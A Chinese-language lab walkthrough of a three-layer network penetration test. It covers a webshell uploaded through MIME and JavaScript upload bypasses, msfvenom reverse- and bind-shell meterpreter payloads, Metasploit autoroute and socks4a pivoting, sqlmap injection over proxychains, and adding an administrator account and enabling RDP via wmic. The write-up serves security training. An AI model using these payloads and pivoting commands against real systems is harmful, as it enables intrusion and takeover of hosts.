三层网络渗透测试实验

Delina

前言

在渗透测试过程中我们会遇到很多不同的网络情况，或许普通的内网渗透我们已经很熟练了，但在现实环境中或许会有多层网络结构，如果遇到多层网络结构我们应该如何进行渗透呢？

利用这个实验我们就可以更清晰的了解多层网络渗透测试的过程。并了解通过msf进行内网渗透，由一级代理到二级代理的搭建来进行对三层网络的渗透的过程。

三层网络拓扑图
​

第一层主机
目标ip：192.168.31.207，访问目标ip发现是一个文件上传页面
​

经测试可通过文件类型MIME绕过进行上传php脚本，上传成功后返回路径
​

访问返回的文件路径，成功连接到php大马
​

查看ip发现该主机是双网卡，第二层网络段为192.168.1.0/24
​

为进一步进行内网渗透，我们上传msf后门，后门制作：

• 
  

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.207 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >shell.elf

将后门上传到第一层主机192.168.31.207，设置msf监听
​​​​

在第一层主机上运行shell.elf，msf获得meterpreter

1. <div>Chmod 777 shell.elf</div><div>./shell.elf</div>

复制代码

​

将第一层的meterpreter切换到后台运行
background
​

第二层主机
利用第一层的meterpreter添加第二层的路由
run autoroute -s 192.168.1.0/24

​

扫描发现第二层主机ip为192.168.1.100，接着利用msf搭建socks代理，好让攻击机直接打第二层网络：
use auxiliary/server/socks4a
​

设置好代理后访问192.168.1.100成功访问到网站
​

利用弱口令admin/admin登录到后台，在设置处发现可修改允许上传文件的类型，修改后保存设置
​

在撰写新文章处添加附件可直接上传php脚本
​

成功连接到php大马
​

为了打开第三层，我们需要在第二层主机上传msf后门，制作后门：
msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=1234 -f elf > ding.elf

利用大马上传，并在第二层主机上运行
chmod 777 ding.elf
./ding.elf
设置msf相关配置
​

成功获取到第二层主机meterpreter
​
​​​
查看ip发现第三层网段为192.168.2.0/24
​

利用第二层主机的meterpreter添加第三层的网络路由
​

启用一个socks4a代理给第三层网络，端口设置为2334
​

然后在配置文件中加上
socks4 192.168.31.119  2334
​

利用获得的meterpreter发现第三层目标主机为192.16.2.100
​

第三层主机
使用代理打开Firefox访问第三层主机ip192.168.2.100
​

通过测试发现http://192.168.2.100/category.php?cat_id=1处存在sql注入
​

利用proxychains跑一下sqlmap

• 
  

proxychains sqlmap -u"http://192.168.2.100/category.php?cat_id=1"
​

成功注出后台账号和加密的密码
​

发现管理员密码解不开，利用nmap扫描网站后台路径

• 
  

proxychains nmap --script http-enum -p80 192.168.2.100
​

发现有个上传点，测试发现该上传点是前端检测，利用JavaScript绕过即可上传成功
​

访问/upload/uploads/webshelldama.php成功连接到php大马
​

利用大马查看发现是windows2003系统
​

添加用户账号密码
​

将添加的用户账号密码添加到管理组
​

利用大马开启3389端口

• 
  

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
​

成功开启3389端口
​

利用添加的管理员账号密码成功登录到远程桌面
​